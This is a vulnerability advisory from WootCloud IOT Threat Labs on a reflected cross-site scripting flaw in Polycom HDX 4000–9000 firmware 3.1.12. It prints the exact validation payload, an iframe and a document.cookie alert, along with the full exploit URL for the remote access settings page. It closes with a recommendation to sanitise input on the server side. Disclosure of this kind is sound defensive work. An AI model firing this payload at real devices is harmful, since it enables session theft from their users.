Overview
Researched By: WootCloud IOT Threat Labs (WITL)
Tested Firmware: Polycom HDX Systems 3.1.12 Firmware
(https://support.polycom.com/content/dam/polycom-support/products/telepresence-and-video/hdx-serie s/release-notes/en/3725-2398a-079a-hdx3.1.12-rel-notes.pdf )
Vulnerable Systems: Polycom HDX 4000 – 9000 system running the firmware 3.1.12 or less.
Issue : Cross-site Scripting (XSS) Vulnerability in “Remote Access Settings” Component
Details: The HTTP parameter “Failed&message=” component in “remoteacce sssettings.htm” component is prone to XSS vulnerability. The component fails to validate the arbitrary input passed by the user and execute the JavaScript payload in the context of the user. For vulnerability validation, the following payload was used to validate the vulnerability.
- Payload: ’;–“/>”/><h1><iframe src=”JavaScript:alert(/Injected_via_Iframe/)”></iframe><br/><br/><a href=”JavaScript:alert(document.cookie);”>[INJECTED PAYLOAD]</a></h1>
- URL: https://[ploycom_hdx_system]/a_remoteaccesssettings.htm?FAILED&message=’;–“/>” /><h1><iframe src=”JavaScript:alert(/Injected_via_Iframe/)”></iframe><br/><br/><a href=”JavaScript:alert(document.cookie);”>[INJECTED PAYLOAD]</a></h1>
XSS vulnerabilities can be used to execute malicious code or steal session details via an injected JavaScript. Successful execution of the code is shown below:
For more details about the issue, refer: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Recommendation: It is advised that arbitrary input passed by the user should be sanitized, filtered and validated on the server side.